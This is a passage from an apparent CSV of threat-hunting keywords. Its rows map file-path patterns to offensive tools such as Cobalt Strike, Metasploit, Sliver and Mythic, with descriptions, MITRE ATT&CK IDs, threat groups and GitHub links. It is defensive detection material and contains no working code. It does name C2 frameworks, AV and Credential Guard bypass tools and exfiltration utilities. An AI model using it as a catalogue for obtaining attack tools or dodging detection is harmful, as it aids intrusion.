T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/formatted_shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/build/shellcode*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/BuildBOFs/*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*/burp/releases/community/latest*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/burp-api/*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/burp-Dirbuster*","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/vulnersCom/burp-Dirbuster","1","1","N/A","N/A","1","71","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z" +"*/burpee.py*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" +"*/BurpExtender.java*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*/burp-proxy*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/BurpSuite-collections*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*/BUYTHEAPTDETECTORNOW*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/byakugan.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/byakugan.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bypass.vbs*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Bypass/payloads*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/bypass_mod/loader*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*/BypassAV/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","830","126","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" +"*/bypassAV-1/*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*/BypassCredGuard.git*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*/BypassFramework.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/bypassuac/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/C2/Beacon/*.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/c2/c2.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/C2/c2.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*/C2/Http/*.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/C2/server.py*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*/C2/SmbListener.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/c2/tcp-stager.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/c2_code/*.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/c2_code/server*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/C2_Profiles/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/C2_Server.git*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*/c2_server/resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*/C2concealer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/C2Frame.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/C2Manager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*/c2profile.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/c2profile.go*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 